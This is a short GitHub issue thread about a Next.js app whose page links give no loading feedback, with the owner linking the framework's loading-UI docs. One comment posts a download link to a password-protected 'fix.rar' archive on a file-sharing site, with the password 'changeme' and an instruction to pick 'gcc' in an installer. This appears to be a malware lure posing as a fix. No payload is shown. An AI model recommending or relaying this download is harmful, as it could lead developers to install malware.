### ISSUE TITLE
Pinball - Loading

### ISSUE THREAD

**Issue by emb417** [emb417/metaforiq-next#45]
Links between pages don't have feedback after invoking...seems like nothing is happening until the next page loads...

https://nextjs.org/docs/app/building-your-application/routing/loading-ui-and-streaming

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by emb417** [comment]
v3.20.14
